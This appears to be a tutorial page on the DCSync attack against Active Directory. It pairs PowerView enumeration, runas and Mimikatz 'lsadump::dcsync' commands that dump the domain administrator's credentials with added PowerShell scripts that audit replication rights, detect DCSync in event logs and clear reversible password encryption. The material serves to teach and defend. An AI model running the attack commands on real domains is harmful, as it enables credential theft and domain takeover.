Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity.
Step 1. Define User’s SID and Check Replication Rights
- Import the PowerView module:
- View the group membership of a user (e.g., adunn):
Get-DomainUser -Identity [USERNAME] | select samaccountname, objectsid, memberof, useraccountcontrol | fl
- Define the user's SID (Security Identifier). Replace the placeholder with the actual SID of the user you are investigating:
$sid = "S-1-5-21-1234567890-9876543210-4567891230-5678"
- Check if the user has replication rights for the specified domain:
Get-ObjectAcl -Identity "DC=EXAMPLE,DC=LOCAL" -ResolveGUIDs |
Where-Object { ($_.ObjectAceType -match 'Replication-Get') } |
Where-Object { $_.SecurityIdentifier -match $sid } |
Select-Object AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
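The PowerView query above answers the question for one SID. As an added example (not code from the original page), the script below generalizes it for a defender: it walks the ACL of the domain head with the ActiveDirectory module, lists every principal that holds a replication extended right, and marks anything outside a baseline of default holders for review. The baseline list and the function name Get-ReplicationRightHolders are assumptions; adjust the baseline to what is legitimately present in your forest (for example Exchange or backup service groups).

```powershell
# Added example, not from the original page: audit who can request replication
# (the prerequisite for DCSync) on the domain head.
Import-Module ActiveDirectory

# Extended-right GUIDs that grant replication; these are the well-known schema values.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    param(
        # Distinguished name of the domain head, e.g. "DC=EXAMPLE,DC=LOCAL".
        [string]$DomainDN = (Get-ADDomain).DistinguishedName
    )
    $domainSid = (Get-ADDomain).DomainSID.Value

    # Assumed baseline of principals that hold these rights in a default domain.
    $expected = @(
        'S-1-5-9'          # Enterprise Domain Controllers
        'S-1-5-32-544'     # BUILTIN\Administrators
        "$domainSid-516"   # Domain Controllers
        "$domainSid-519"   # Enterprise Admins
        "$domainSid-521"   # Read-only Domain Controllers
    )

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $guid   = $ace.ObjectType.ToString().ToLower()
        $rights = $ace.ActiveDirectoryRights
        $matched = $null
        if ($ReplicationRights.ContainsKey($guid)) {
            $matched = $ReplicationRights[$guid]
        } elseif ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            # Full control implies every extended right, so it must be reported too.
            $matched = 'GenericAll (implies replication rights)'
        } elseif ($guid -eq [guid]::Empty.ToString() -and
                  $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
            # ExtendedRight with an empty object type means "all extended rights".
            $matched = 'All extended rights'
        }
        if (-not $matched) { continue }

        # Compare SIDs rather than display names so renamed groups cannot hide.
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $sid = $ace.IdentityReference.Value }

        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            SID       = $sid
            Right     = $matched
            Inherited = $ace.IsInherited
            Status    = if ($expected -contains $sid) { 'expected' } else { 'REVIEW' }
        }
    }
}

# Usage: anything marked REVIEW is a principal whose compromise would allow DCSync.
Get-ReplicationRightHolders | Sort-Object Status, Identity | Format-Table -AutoSize
```

Entries marked REVIEW should be traced back to the change that granted them; an ordinary user or service account appearing here is the condition the earlier `$sid` check detects for a single account.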
Step 2. Perform DCSync
- Open a PowerShell session as the user with DCSync privileges:
runas /netonly /user:EXAMPLE\[USERNAME] powershell
- Run Mimikatz:
- Enable debug privileges:
mimikatz # privilege::debug
- Execute DCSync:
mimikatz # lsadump::dcsync /domain:EXAMPLE.LOCAL /user:EXAMPLE\administrator
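A DCSync request is a normal replication call, so on the domain controller it is recorded like any other directory access. As an added example (not from the original page), the script below reads Security event 4662 (Directory Service Access) and reports replication requests that did not come from a domain controller computer account. It assumes the "Directory Service Access" audit subcategory is enabled on the DC, that the ActiveDirectory module is available to enumerate DC names, and the function name Find-SuspiciousReplication is an assumption.

```powershell
# Added example, not from the original page: detect DCSync-style replication
# requests from Security event 4662 on a domain controller.
Import-Module ActiveDirectory

# Extended-right GUIDs that appear in the Properties field of 4662 for replication.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function Find-SuspiciousReplication {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        # Domain controller whose Security log is read; defaults to the local machine.
        [string]$ComputerName = $env:COMPUTERNAME,
        # Accounts allowed to replicate: the DC computer accounts (name plus trailing '$').
        [string[]]$AllowedSubjects = ((Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" })
    )

    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName = 'Security'; Id = 4662; StartTime = $Since
    } -ErrorAction SilentlyContinue

    foreach ($ev in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$ev.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $props = $data['Properties']
        $hits  = @($ReplicationGuids | Where-Object { $props -match $_ })
        if ($hits.Count -eq 0) { continue }                          # not a replication right

        if ($AllowedSubjects -contains $data['SubjectUserName']) { continue }   # legitimate DC

        [pscustomobject]@{
            Time    = $ev.TimeCreated
            Subject = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Object  = $data['ObjectName']
            Access  = $data['AccessMask']
            Rights  = $hits -join ','
        }
    }
}

# Usage: any row here is a non-DC principal that replicated directory data.
Find-SuspiciousReplication | Format-Table -AutoSize
```

The allow-list is keyed on DC computer accounts rather than on any name ending in `$`, because a compromised member server account would otherwise be skipped. Azure AD Connect or similar synchronization accounts are expected to show up and should be added to `-AllowedSubjects` once confirmed.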
Step 3. Additional Enumeration
- Check if any user accounts have the reversible encryption option enabled:
Get-DomainUser -Identity * |
? { $_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*' } |
select samaccountname, useraccountcontrol
- Enumerate accounts with reversible encryption using Get-ADUser:
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
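Finding accounts with reversible encryption is half of the job; the flag can also be re-applied by password policy. As an added example (not from the original page), the script below reports the flagged accounts, checks the default and fine-grained password policies that can set the flag, and previews the fix. The function name Repair-ReversibleEncryption and the `-Fix` switch are assumptions; without `-Fix` every change runs with `-WhatIf`.

```powershell
# Added example, not from the original page: report and remediate accounts whose
# userAccountControl has ENCRYPTED_TEXT_PWD_ALLOWED (bit 128) set.
Import-Module ActiveDirectory

$ENCRYPTED_TEXT_PWD_ALLOWED = 128

function Repair-ReversibleEncryption {
    param([switch]$Fix)

    # Policies that can switch the flag back on for whole groups of users.
    $defaultPolicy = Get-ADDefaultDomainPasswordPolicy
    if ($defaultPolicy.ReversibleEncryptionEnabled) {
        Write-Warning 'Default domain password policy stores passwords with reversible encryption.'
    }
    Get-ADFineGrainedPasswordPolicy -Filter * |
        Where-Object { $_.ReversibleEncryptionEnabled } |
        ForEach-Object { Write-Warning "Fine-grained policy '$($_.Name)' enables reversible encryption." }

    $users = Get-ADUser -Filter "userAccountControl -band $ENCRYPTED_TEXT_PWD_ALLOWED" `
                        -Properties userAccountControl, PasswordLastSet

    foreach ($u in $users) {
        # Clearing the flag only affects future passwords; the currently stored
        # password stays reversible until the user changes it.
        if ($Fix) {
            Set-ADUser -Identity $u -AllowReversiblePasswordEncryption $false
        } else {
            Set-ADUser -Identity $u -AllowReversiblePasswordEncryption $false -WhatIf
        }
        [pscustomobject]@{
            SamAccountName     = $u.SamAccountName
            PasswordLastSet    = $u.PasswordLastSet
            FlagCleared        = [bool]$Fix
            NeedsPasswordReset = $true
        }
    }
}

# Usage: preview first, then run again with -Fix once the list has been reviewed.
Repair-ReversibleEncryption | Format-Table -AutoSize
```

Because the stored value is not rewritten when the flag is cleared, each affected account should also have its password reset (or the user forced to change it) after the policy source has been corrected, otherwise the next policy refresh can re-enable the flag.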